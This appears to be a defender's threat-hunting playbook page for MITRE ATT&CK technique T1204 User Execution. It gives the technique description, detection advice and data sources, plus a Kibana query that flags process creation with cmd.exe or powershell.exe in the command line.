# T1204 User Execution

-----------------------------------------------------------------------

## Technique Description

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).

While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)

## Technique Detection

Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.

Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

-----------------------------------------------------------------------

### Tactics:

  *   Execution

### Platforms:

  * Linux

  * Windows

  * macOS

  * IaaS

  * Containers

### Data Sources:

  * **Container:** Container Start

  * **Command:** Command Execution

  * **Instance:** Instance Creation

  * **Instance:** Instance Start

  * **File:** File Creation

  * **Network Traffic:** Network Traffic Content

  * **Process:** Process Creation

  * **Application Log:** Application Log Content

  * **Container:** Container Creation

  * **Network Traffic:** Network Connection Creation

  * **Image:** Image Creation

-----------------------------------------------------------------------

### Adversarial usage:

| Adversary Group |  Adversarial Usage |
|----|----|
-----------------------------------------------------------------------

## Mitre References

  * [Mitre-Attack](https://attack.mitre.org/techniques/T1204)

  * [Telephone Attack Delivery](https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery), Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November 4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery. Retrieved January 5, 2022.

> *Note: Do not edit this cell with information you want to keep. This cell will be wiped when the update script is ran. Store permanent information in one of the relevant cells below*

*Last pulled from Mitre on: 23 June 2022*



-----------------------------------------------------------------------

## Metadata

  * **Last Updated  Date:** 22 July 2021

  * **Author(s):** SSgt Johnathan Smith, SSgt John Beres, Taylor Booth

  * **Validated:** NO

-----------------------------------------------------------------------

## Overall Hypothesis

- N/A

## Adversary Examples

| Adversary Specific Examples | Host Analytics | Network Analytics |
|-----------------------------|----------------|-------------------|
| Example APT/Threat actor | 1, 2 | 2, 3, 5|

## Detection Blindspots

- Sensor Location

## Analytical References

  * [T1140 - Deobfuscate/Decode Files](http://10.24.35.157/lab/workspaces/auto-b/tree/playbooks/Enterprise/Defense%20Evasion/T1140%20Deobfuscate%20Decode%20Files%20Or%20Information.ipynb)

-----------------------------------------------------------------------

## Host Analytics

-----------------------------------------------------------------------

### Hunter Notes

- Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.

- Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

- Compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads may also be used with this TTP. See [T1140 - Deobfuscate/Decode Files](http://10.24.35.157/lab/workspaces/auto-b/tree/playbooks/Enterprise/Defense%20Evasion/T1140%20Deobfuscate%20Decode%20Files%20Or%20Information.ipynb) or Information for more possible analytics.

#### Analytic 1

  * **Information:** Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction.

  * **Source:** Winlogbeat, Sysmon

  * **Tool:** Kibana

  * **Notes:** Noisy search: use strict time constraints.

  * **Query:** ```event.code:4688 AND winlog.event_data.CommandLine: ("*cmd.exe*" OR "*powershell.exe*")```



-----------------------------------------------------------------------

## Network Analytics

-----------------------------------------------------------------------

